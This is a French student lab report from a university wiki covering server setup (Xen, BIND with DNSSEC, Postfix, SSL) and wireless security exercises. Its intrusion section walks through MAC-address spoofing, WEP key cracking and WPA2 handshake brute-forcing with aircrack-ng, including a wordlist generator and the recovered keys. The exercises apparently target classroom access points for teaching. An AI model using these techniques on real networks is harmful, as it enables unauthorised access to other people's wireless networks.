&lt;br /&gt;
root@cordouan:/etc/xen# xl list&lt;br /&gt;
root@cordouan:/etc/xen# xl create chien.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
connexion à notre MV:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
root@cordouan:/etc/xen# xl console chien&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration de Xen:&lt;br /&gt;
- On autorise les connexion ssh en root&lt;br /&gt;
- On retire Network Manger pour configurer la connexion au réseau manuellement &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# /etc/ssh/sshd_config&lt;br /&gt;
# PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
# if down eth0 &lt;br /&gt;
# ifup etho&lt;br /&gt;
# apt-get purge network-manage systemd &lt;br /&gt;
# inittable&lt;br /&gt;
// fin ligne tty0 ==&amp;gt; hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// Configuration de eth0&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.181&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 gatway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
root@chien:~# ifdown eth0 &lt;br /&gt;
root@chien:~# ifup eth0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
root@chien:~# apt-get install vim strace tcpdump &lt;br /&gt;
root@chien:~# apt-get install host&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Services Internet &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Serveur DNS&amp;lt;/h2&amp;gt;&lt;br /&gt;
modification du fichier /var/cache/bind option&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cat /etc/bind/named.conf.options &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
host -t ni love-in-the-world.space&lt;br /&gt;
host -t any love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
cat db.love-in-the-world &lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
cat /var/log/daemon.log&lt;br /&gt;
**** afficher le fichier ****&lt;br /&gt;
&lt;br /&gt;
# service bind9 stop&lt;br /&gt;
# service bind9 start&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Géneration d'une clés assymetrique:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair...........+++ ....................+++ &lt;br /&gt;
Klove-in-the-world.space.+005+14281&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.key  love-in-the-world-ksk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+14281.private  love-in-the-world-ksk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE love-in-the-world.space&lt;br /&gt;
Generating key pair........++++++ .....................++++++ &lt;br /&gt;
Klove-in-the-world.space.+005+37866&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.key  love-in-the-world-zsk.key&lt;br /&gt;
# mv Klove-in-the-world.space.+005+37866.private  love-in-the-world-zsk.private&lt;br /&gt;
&lt;br /&gt;
# dnssec-signzone -o love-in-the-world.space -k love-in-the-world-ksk ../db.love-in-the-world love-in-the-world-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.love-in-the-world.signed&lt;br /&gt;
root@chien:/etc/bind/love-in-the-world# &lt;br /&gt;
&lt;br /&gt;
:/etc/bind# nano named.conf.local &lt;br /&gt;
zone &amp;quot;love-in-the-world.space&amp;quot;{&lt;br /&gt;
&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.love-in-the-world.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
ensuite on copie le contenu du fichier:&lt;br /&gt;
dans gandi.net &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
on peut verifier que notre dns est secure a l'adresse suivante:&lt;br /&gt;
&amp;lt;url&amp;gt; http://dnsviz.net/d/love-in-the-world.space/dnssec/ &amp;lt;/url&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Recuperation du certificat SSL&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur &lt;br /&gt;
&lt;br /&gt;
Instalation et Configuration de la boite Mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install postfix bsd-mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
configuration de la boite mail &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # nano /etc/aliases&lt;br /&gt;
   postmaster:    root&lt;br /&gt;
   admin: root&lt;br /&gt;
 &lt;br /&gt;
 # newaliases&lt;br /&gt;
 # mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail &lt;br /&gt;
E-mail: admin@love-in-the-world.space&lt;br /&gt;
&lt;br /&gt;
Verfification:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# mailx&lt;br /&gt;
From Maxime.Strunc@polytech-lille.net  Fri Nov 20 13:22:24 2015&lt;br /&gt;
Return-Path: &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Original-To: admin@love-in-the-world.space&lt;br /&gt;
Delivered-To: admin@love-in-the-world.space&lt;br /&gt;
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])&lt;br /&gt;
	by chien (Postfix) with ESMTP id E7DA93421F&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 13:22:24 +0100 (CET)&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr&lt;br /&gt;
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])&lt;br /&gt;
	(Authenticated sender: mstrunc)&lt;br /&gt;
	by peronne.escaut.net (Postfix) with ESMTPA id 305081C38&lt;br /&gt;
	for &amp;lt;admin@love-in-the-world.space&amp;gt;; Fri, 20 Nov 2015 11:33:52 +0100 (CET)&lt;br /&gt;
MIME-Version: 1.0&lt;br /&gt;
Content-Type: text/plain; charset=UTF-8;&lt;br /&gt;
 format=flowed&lt;br /&gt;
Content-Transfer-Encoding: 7bit&lt;br /&gt;
Date: Fri, 20 Nov 2015 11:33:52 +0100&lt;br /&gt;
From: Maxime Strunc &amp;lt;Maxime.Strunc@polytech-lille.net&amp;gt;&lt;br /&gt;
To: &amp;lt;admin@love-in-the-world.space&amp;gt;&lt;br /&gt;
Subject: Hello&lt;br /&gt;
Message-ID: &amp;lt;478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net&amp;gt;&lt;br /&gt;
X-Sender: Maxime.Strunc@polytech-lille.net&lt;br /&gt;
User-Agent: Roundcube Webmail/0.7.2&lt;br /&gt;
Status: RO&lt;br /&gt;
&lt;br /&gt;
Hey it's working&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
- Recupération du Certificat:&lt;br /&gt;
Je vais sur Gandi.net&lt;br /&gt;
&lt;br /&gt;
génération de la CSR&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#   openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr&lt;br /&gt;
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : &lt;br /&gt;
admin@love-in-the-world.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres avoir renseigner tout les champs, &lt;br /&gt;
j'obtient la CSR: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
       ... texte crypter...&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Je la copie dans l'emplacement voulue sur gandi.net&lt;br /&gt;
&lt;br /&gt;
Gandi m'envoi un mail a l'adresse informée &amp;quot;admin@love-in-the-world.space&amp;quot;&lt;br /&gt;
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.&lt;br /&gt;
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#nano 000-domain.tld-ssl.conf&lt;br /&gt;
    &amp;lt;VirtualHost 193.48.57.181:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.love-in-the-world.space&lt;br /&gt;
        ServerAlias love-in-the-world.space&lt;br /&gt;
        DocumentRoot /var/www/html/&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
        SSLCertificateFile /root/chien.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/chien.key&lt;br /&gt;
        SSLCertificateChainFile /root/gandi.crt&lt;br /&gt;
        SSLVerifyClient None&lt;br /&gt;
&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
#a2enmod ssl&lt;br /&gt;
#service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Test d'intrusion &amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci.  &lt;br /&gt;
&lt;br /&gt;
Changement d'adresse MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On change la cles par: 0000000000&lt;br /&gt;
et le SSID : T1&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# cat /etc/network/interfaces&lt;br /&gt;
# source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
# auto lo&lt;br /&gt;
# iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
Ethernet interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
  address 172.26.79.241&lt;br /&gt;
  netmask 255.255.240.0&lt;br /&gt;
  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T1&lt;br /&gt;
	wireless-key 0000000000&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Préparation aux cassage de clés&amp;lt;/h2&amp;gt;&lt;br /&gt;
- Instalation aircrack-ng&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# apt-get install aircrack-ng firmware ralink&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
- Instalation du port usb-Wifi&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install firmware ralink&lt;br /&gt;
airmon-ng start wlan1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WEP &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je scan le reseaux Wifi: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J’identifie le ssid de cracotte06 et je met les donnée  dans un fichier nommé fcracotte06&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w&lt;br /&gt;
fcracotte06&lt;br /&gt;
&lt;br /&gt;
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
La capture a donc commencé &lt;br /&gt;
&lt;br /&gt;
Dans un autre terminal:&lt;br /&gt;
Je vais analyser mon fichier de capture pour casser la cles.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ls&lt;br /&gt;
# aircrack-ng fcracotte06-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
apres quelque minutes on obtient la cles &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                 [00:06:58] Tested 965565 keys (got 60459 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) &lt;br /&gt;
    1    0/  1   AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) &lt;br /&gt;
    2    0/  1   AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) &lt;br /&gt;
    3    4/  5   AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) &lt;br /&gt;
    4    0/  1   AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) &lt;br /&gt;
    5    0/  1   AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) &lt;br /&gt;
    6    0/  1   AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) &lt;br /&gt;
    7    0/  1   AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) &lt;br /&gt;
    8    0/  1   AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) &lt;br /&gt;
    9    0/  3   D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) &lt;br /&gt;
   10    0/  1   5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) &lt;br /&gt;
   11   13/  1   48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) &lt;br /&gt;
   12    0/  1   BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Cassage d'une cles WPA&amp;lt;/h2&amp;gt;&lt;br /&gt;
Cette partie consiste a casser une clés WPA par force brute.&lt;br /&gt;
Je m'interesse plus particulierement a caracotte06 comme précédament.&lt;br /&gt;
 &lt;br /&gt;
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake.   &lt;br /&gt;
&lt;br /&gt;
Recuperation du Handshake: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng --encrypt wpa mon0&lt;br /&gt;
&lt;br /&gt;
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06&lt;br /&gt;
&lt;br /&gt;
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 &lt;br /&gt;
&lt;br /&gt;
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID&lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 &lt;br /&gt;
&lt;br /&gt;
BSSID STATION PWR Rate Lost Frames Probe &lt;br /&gt;
&lt;br /&gt;
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
creation d'un dictionaire :&lt;br /&gt;
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.&lt;br /&gt;
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
int main ()&lt;br /&gt;
{&lt;br /&gt;
int val=0;&lt;br /&gt;
for(val=0;val&amp;lt;99999999 ;val++)&lt;br /&gt;
{printf(&amp;quot;%08d\n&amp;quot;,val); }&lt;br /&gt;
return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Compilation :&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
# gcc -Wall Dictionnaire.c -o Dictionnaire&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création :&lt;br /&gt;
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# ./Dictionnaire &amp;gt; Dico&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Cassage de la cles: &lt;br /&gt;
après avoir récuperer le Handshake du Wifi carotte06&lt;br /&gt;
Je vais casser la clés en utilisant mon dictionnaire &amp;quot;Dico&amp;quot; le fichier &amp;quot;wpacracotte06-02.cap&amp;quot;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w Dico wpacracotte06-02.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
après quelle que heures j'obtiens la clès:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [02:00:57] 12399908 keys tested (1782.72 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399906 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B &lt;br /&gt;
                       75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E &lt;br /&gt;
                       94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E &lt;br /&gt;
                       F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E &lt;br /&gt;
                       22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
mettre serveur messagerie &lt;br /&gt;
demander certificat&lt;br /&gt;
&lt;br /&gt;
securisation wifi &lt;br /&gt;
WPA-EAP&lt;/div&gt;</summary>
		<author><name>Mstrunc</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23383</id>
		<title>TP sysres IMA2a5 2015/2016 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&amp;diff=23383"/>
				<updated>2015-11-27T12:47:57Z</updated>
		
		<summary type="html">&lt;p&gt;Mstrunc : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Ce mini projet a pour but de nous donner des notion en sécurité informatique.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;Configuration du point d’accès&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h2&amp;gt;Restriction par adresse MAC &amp;lt;/h2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nom&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;adresse MAC&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7::19:f3&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e6:ed:b1&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:22:43:43:e7:7d&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;00:15:af:e7:64:03&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère les adresses mac comme ci dessous.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@heron:~$ su&lt;br /&gt;
Mot de passe : &lt;br /&gt;
root@heron:/home/pifou# ifconfig &lt;br /&gt;
lo        Link encap:Boucle locale  &lt;br /&gt;
          inet adr:127.0.0.1  Masque:255.0.0.0&lt;br /&gt;
          adr inet6: ::1/128 Scope:Hôte&lt;br /&gt;
          UP LOOPBACK RUNNING  MTU:65536  Metric:1&lt;br /&gt;
          RX packets:2348 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
          TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:0 &lt;br /&gt;
          RX bytes:244556 (238.8 KiB)  TX bytes:244556 (238.8 KiB)&lt;br /&gt;
&lt;br /&gt;
wlan0     Link encap:Ethernet  HWaddr 00:22:43:43:e7:7d  &lt;br /&gt;
          inet adr:172.26.79.61  Bcast:172.26.79.255  Masque:255.255.240.0&lt;br /&gt;
          adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien&lt;br /&gt;
          adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global&lt;br /&gt;
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1&lt;br /&gt;
          RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0&lt;br /&gt;
          TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
          collisions:0 lg file transmission:1000 &lt;br /&gt;
          RX bytes:7742849 (7.3 MiB)  TX bytes:1442360 (1.3 MiB)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du point d’accès Cisco &amp;lt;/h3&amp;gt;&lt;br /&gt;
Conexion a la borne Cisco :&lt;br /&gt;
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
pifou@zabeth04:~$ su&lt;br /&gt;
pifou@zabeth04:~$ minicom&lt;br /&gt;
&lt;br /&gt;
// conexion au point Cisco &lt;br /&gt;
ap#enable&lt;br /&gt;
ap#Config t &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut autoriser les  adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#no access-list 701 deny  0000.0000.0000 ffff.ffff.ffff               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.6403  0000.0000.0000               &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe7.19f3  0000.0000.0000&lt;br /&gt;
ap(config)#access-list 701 permit  0015.afe6.edb1  0000.0000.0000 &lt;br /&gt;
ap(config)#access-list 701 deny    0000.0000.0000  ffff.ffff.ffff &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ap(config)#dot11 ssid T2&lt;br /&gt;
ap(config-ssid)#dot11 ssid T2 &lt;br /&gt;
ap(config-ssid)#authentication open&lt;br /&gt;
ap(config-ssid)#guest-mode &lt;br /&gt;
ap(config)#interface dot11Radio0 &lt;br /&gt;
&lt;br /&gt;
ap(config-if)#ssid T2&lt;br /&gt;
ap(config-if)#encryption key 1&lt;br /&gt;
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key&lt;br /&gt;
ap(config-if)#encryption mode Wep mandatory &lt;br /&gt;
end&lt;br /&gt;
&lt;br /&gt;
ap(config)#interface Dot11Radio0&lt;br /&gt;
ap(config-if)#no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour voir si des machines sont connecté sur le point d’accès  &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
sh do11 associations&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Configuration du Wifi sur l'eeePC&amp;lt;/h3&amp;gt;&lt;br /&gt;
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.&lt;br /&gt;
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. &lt;br /&gt;
&lt;br /&gt;
Configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@heron:/home/pifou# cat /etc/network/interfaces&lt;br /&gt;
source /etc/network/interfaces.d/*&lt;br /&gt;
&lt;br /&gt;
# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# Ethernet interface&lt;br /&gt;
#auto eth0&lt;br /&gt;
#iface eth0 inet static&lt;br /&gt;
#  address 172.26.79.241&lt;br /&gt;
#  netmask 255.255.240.0&lt;br /&gt;
#  gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
auto wlan0&lt;br /&gt;
iface wlan0 inet static&lt;br /&gt;
	wireless-mode managed&lt;br /&gt;
	wireless-essid T2&lt;br /&gt;
	wireless-key 1111111111&lt;br /&gt;
	address 172.26.79.61&lt;br /&gt;
	netmask 255.255.240.0&lt;br /&gt;
	gateway 172.26.79.254&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
conexion au PA&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ifup wlan0&lt;br /&gt;
iwconfig wlan0 essid T2&lt;br /&gt;
